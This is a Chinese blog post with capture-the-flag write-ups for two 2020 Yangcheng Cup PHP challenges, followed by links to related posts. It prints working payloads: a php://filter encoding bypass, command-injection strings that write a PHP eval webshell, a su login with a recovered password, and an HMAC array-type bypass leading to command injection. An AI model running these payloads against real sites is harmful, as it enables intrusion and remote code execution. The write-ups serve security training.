[羊城杯 2020]Easyphp2&&[羊城杯 2020]Blackcat

最新推荐文章于 2024-04-07 22:01:53 发布
最新推荐文章于 2024-04-07 22:01:53 发布
阅读量129 收藏
点赞数
文章标签: web安全 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/134793656
版权

[羊城杯 2020]Easyphp2

思路

1.修改Cookie: pass=GWHT,我没有看robots.txt,直接猜到的

2.绕过协议,二次编码就行,或者更改别的过滤器

?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php

3.得到源码

<?php
if (isset($_GET["count"])){
$count $_GET[count"]:
if(preg_match ('/base64rot13|base32 base16<\?php #/i',$count)){
die ('hacker !')
}
echo <h2>
The Count is:"exec('printf \'' .$count.'\' | wc -c')."</h2>
}
?>

这里浅谈一下

<?php
print(exec('ls'));#script.php
print(exec('pwd'));#/box
print(exec('ls;pwd'));#/box
print(exec('ls||pwd'));#script.php
print(exec('ls&&pwd'));#/box
print(exec('ls|pwd'));#/box
print(exec('pwd&&ls||pwd'));#script.php
?>

总结:如果有回显,只有||命令回显的是前面执行的命令(因为后面的命令没有执行了),其他的都是回显后面的命令

payload

对于这道题目,过滤了 ;,不过还有 | 也可以用

直接写入

1'|echo"<?=eval(\$_POST[cmd])?>">1.php||'1
短一点的话可以
1'|echo"<?=eval(\$_POST[cmd])?>">'1.php     其实就是'1.php闭合了后面的'

如果想看ls执行并且有回显的话(其实没啥用),可以

1'%26%26ls||'1
不过,ls /的时候,显示不完全,因为exec直接打印的话只会输出一行代码,可能跟换行有关
不过可以这样让他显示
1'%26%26ls%20/|tee%20b||'1
然后访问/b就行了

直接蚁剑链接上

找了半天才找到flag.txt,不过没有权限

使用
ls -l 查看,发现要GWHT用户才能打开

找到README文件,解码之后得到GWHT用户的密码:GWHTCTF

在蚁剑中可以这样登录并执行命令

printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'

解释:
该指令的意思是将字符串"GWHTCTF"传递给su命令,并使用GWHT用户身份执行后续的命令。在这个例子中,su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'的含义是以GWHT用户的身份执行cat /GWHT/system/of/a/down/flag.txt命令,来查看文件/GWHT/system/of/a/down/flag.txt的内容。

[羊城杯 2020]Blackcat

思路

查看源码,得到提示:<!--都说听听歌了!-->

源码中有音频的链接,点进去划到最下面,得到

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('谁!竟敢踩我一只耳的尾巴!');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}

echo exec("nc".$_POST['One-ear']);

hash_hmac

(PHP 5 >= 5.1.2, PHP 7, PHP 8, PECL hash >= 1.1)

hash_hmac — 使用 HMAC 方法生成带有密钥的散列值

 hash_hmac(
  string `$algo`,#加密的类型
  string `$data`,#要加密的值
  string `$key`,#加密时使用的密钥
  bool `$binary` = `false`#前三个参数是必须的,这个是可选的参数
): string

参数

  • algo

    ​ 要使用的散列算法名称,例如:“md5”、“sha256”、“haval160,4”等。如何获取受支持的算法清单,请参见 hash_hmac_algos() 函数。

  • data

    ​ 要进行散列运算的消息。

  • key

    ​ 使用 HMAC 生成信息摘要时所使用的密钥。

  • binary

    ​ 设置为 true 输出原始二进制数据,设置为 false 输出小写 16 进制字符串。

利用sha不能加密数组的特点,返回的其实是NULL,举例

<?php
$hmac = hash_hmac('sha256', Array(), "SecretKey");
echo $hmac == false;#1
echo $hmac == NULL;#1
echo $hmac == '';#1
echo $hmac === NULL;#1,只有NULL才强等于
// echo hash_hmac('sha256',';env',false)
?>

所以令$_POST['White-cat-monitor']为数组,得到的密钥就变成了NULL,加密$_POST['One-ear']的值变得可控

payload

<?php
echo hash_hmac('sha256',';env',false);#false,NULL,'' 都可以
?>

不过exec只能显示一行,而且这里不能文件写入,flag只能不断尝试了:/flag,flag.php,/flag.txt,flag.txt……

全部尝试了一遍,尝试环境变量env,得到flag

尘佑不尘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
EasyPHP Devserver & Webserver-开源
04-18
EasyPHP Devserver和Webserver使用Devserver和Webserver进行主机开发PHP,Apache,MySQL,Nginx,PhpMyAdmin,Xdebug,PostgreSQL,MongoDB,Python,Ruby ...适用于Windows。 Devserver将安装一个完整且可立即使用...
[羊城 2020]Easyphp2 WP
wmicn的博客
09-15 1877
[羊城 2020]Easyphp2 进入题目,观察到两个点 1.是url中get的file参数 2.是题目要求 only people from GWHT are allowed to access this website 考虑先使用php伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php 测试发现是base64被过滤了,但是quoted-printable-encode并没有被过滤 ?file=php://filt
羊城2020 Easyphp2
qq_53755216的博客
06-24 1091
随便刷一刷 随便总结一下 随便涨点姿势 二话不说先目录扫描 但是扫出来一堆429.。。。 看了一下dirsearch的readme 发现了以下参数 -s DELAY, --delay=DELAY Delay between requests emmm 真不错 重新来! 还是429 .。。。发现线程是30 .。。。 -t THREADS, --threads=THREADS Number of threads
[羊城 2020]Easyphp2 ---不会编程的崽
最新发布
不会编程的崽的博客
04-07 412
伪协议url编码绕过,命令写入一句话木马
buuctf刷题11( | + su -c命令&<?=``;进行rce&tp6.0任意文件操作漏洞&prase_url()函数漏洞)
weixin_63231007的博客
02-06 2024
[羊城 2020]Easyphp2 & [红明谷CTF 2021]write_shell & [GYCTF2020]EasyThinking & [N1CTF 2018]eating_cms
[羊城 2020]easyphp
LYJ20010728的博客
05-17 1099
[羊城 2020]easyphpeasyphp考点思路Payload easyphp 考点 .htaccess的利用 思路 在目录下,只有index.php能够作为php解析执行,于是我们可以写一个.htaccess让index.php自动包含执行代码; 思路一:向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n; 思路二:利用.htaccess文件特性,不过这次是
BUUCTF[羊城2020]easyphp
snowlyzz的博客
08-21 667
刷题记录
[羊城 2020]Easyphp2
GX233的博客
08-24 256
2020 羊城 Easyphp2 writeup
BUUCTF--[羊城 2020]Easyphp2
qq_46263951的博客
08-18 1250
进入后的页面 根据题目提示我们可以知道这是一道PHP代码审计的题 所以使用伪协议查看源代码,这里使用的是两次url编码绕过 /?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php /?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php <!DOCTYPE html> &lt
每日练习-[羊城 2020]easyphp
m0_68113265的博客
08-20 244
通过 php_value 来设置 auto_prepend_file或者 auto_append_file 配置选项包含一些敏感文件,同时在本目录或子目录中需要有可解析的 php 文件来触发。文件名不能字母开头,文件内容也做了过滤。.htaccess 分别通过这两个配置选项来包含 /etc/passwd,并访问同目录下的 index.php文件。e进行绕过最后#<?#是.htaccess文件特别写入。\进行转义\nHello, world。末尾\nHello, world不符合.htaccess的写法。
EasyPHP5-2-17
07-22
资源名称:EasyPHP5-2-17工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
EasyPHP5-2-17.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
[羊城2020]easyphp
shinygod的博客
04-12 1235
知识点:利用.htaccess代码执行 参考: .htaccess利用方式 .htaccess相关问题 <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } }
[羊城2020]
qq_62046696的博客
09-22 379
发现当作html直接输出在页面,并没有解析,或许后台设置了只解析了index.php,毕竟代码对index.php的提醒挺多的,于是在想能不能在index.php之前解析我们的htaccess,将配置项改一下即可,于是学习大佬得知还真是要利用htaccess来进行获取flag。思路:既然我们可以指定文件名,然后指定内容进行输入到文件中,后面的hello world可以在字符串末尾加个/就可以注释掉了,构造一个 a.php文件,然后传入一个一句话木马试一下。与上面对应解码为典型的文件包含漏洞。
攻防世界 easyphp
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值